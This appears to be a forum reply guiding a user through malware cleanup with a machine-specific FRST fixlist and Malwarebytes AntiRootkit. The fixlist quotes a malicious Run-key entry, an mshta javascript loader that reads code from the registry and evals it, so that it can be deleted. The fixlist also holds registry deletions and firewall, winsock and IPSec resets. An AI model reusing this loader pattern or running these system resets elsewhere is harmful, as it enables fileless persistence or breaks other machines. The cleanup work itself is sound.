Hi you will need to uninstall AVG and then run the removal tool https://support.avg.com/SupportArticleView?l=en_US&urlname=How-to-uninstall-AVG
CAUTION : This fix is only valid for this specific machine, using it on another may break your computer
Open notepad and copy/paste the text in the quotebox below into it:
CreateRestorePoint:
HKLM-x32\...\Run: [**66d9dc3c<*>] => mshta javascript:i4hPyNC1P="l8";vG8=new%20ActiveXObject("WScript.Shell");t7gDiPS="tma";j7a7dm=vG8.RegRead("HKLM\\software\\Wow6432Node\\ea6c3e3e\\a6f8fd0b");hHW9sA4nUX="5Rk0pvb";eval(j7a7dm);IJS8ZkBI= (the data entry has 4 more characters). <===== ATTENTION (Value Name with invalid characters)
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => No File
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-3046787366-2328371080-4250773792-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
BHO-x32: No Name -> {889D2FEB-5411-4565-8998-1DD2C5261283} -> No File
FF HKLM\...\Firefox\Extensions: [{8E9E3331-D360-4f87-8803-52DE43566502}] - C:\Program Files\Updater By SweetPacks\Firefox
CustomCLSID: HKU\S-1-5-21-3046787366-2328371080-4250773792-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Tony\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-3046787366-2328371080-4250773792-1001_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Tony\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-3046787366-2328371080-4250773792-1001_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Tony\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-3046787366-2328371080-4250773792-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Tony\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-3046787366-2328371080-4250773792-1001_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Tony\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-3046787366-2328371080-4250773792-1001_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\Tony\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-3046787366-2328371080-4250773792-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Tony\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll No File
AlternateDataStreams: C:\Windows\SysWOW64\-STARTTYPE:AUTORUN
AlternateDataStreams: C:\Windows\SysWOW64\CN1AC111KY05RW:NW
C:\Program Files\Updater By SweetPacks
DeleteKey HKLM\software\Wow6432Node\ea6c3e3e
DeleteKey: HKCU\Software\ea6c3e3e
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
RemoveProxy:
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: ipconfig /flushdns
CMD: netsh winsock reset catalog
CMD: netsh int ip reset c:\resetlog.txt
CMD: ipconfig /release
CMD: ipconfig /renew
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
EmptyTemp:
CMD: bitsadmin /reset /allusers
Save this as fixlist.txt, in the same location as FRST.exe
https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG
Run FRST and press Fix
On completion a log will be generated please post that
THEN
Please download Malwarebytes AntiRootkit and save it to your desktop.
Full instructions how to use MBAR
Please note: This is a beta version so please be sure to read the disclaimer and note of it.
• Unzip/unrar MBAR in a folder to your Desktop and MBAM shall run …
• Click on Next > then on Update button to download fresh definitions.
https://dl.dropboxusercontent.com/u/73555776/mbar_update.JPG
• When database updates click Next
• In the following window ensure “Targets” scan for Drivers; Sectors; System are ticked. Then select “Scan button”
https://dl.dropboxusercontent.com/u/73555776/mbarscan.JPG
• If an infection/s are found ensure “Create Restore Point” is checked, then select the “Cleanup Button” to remove threats.
Or if you are sure any entries should be kept, just untick them. A list of infected files will be listed.
• The Clean up procedure will be Scheduled for process.
• When complete pop-up will show you. Select the Yes button and the system should re-boot to complete the cleaning process.
Please attach the two following logs from the mbar folder:
system-log.txt
and
mbar-log-year-month-day (hour-minute-second).txt.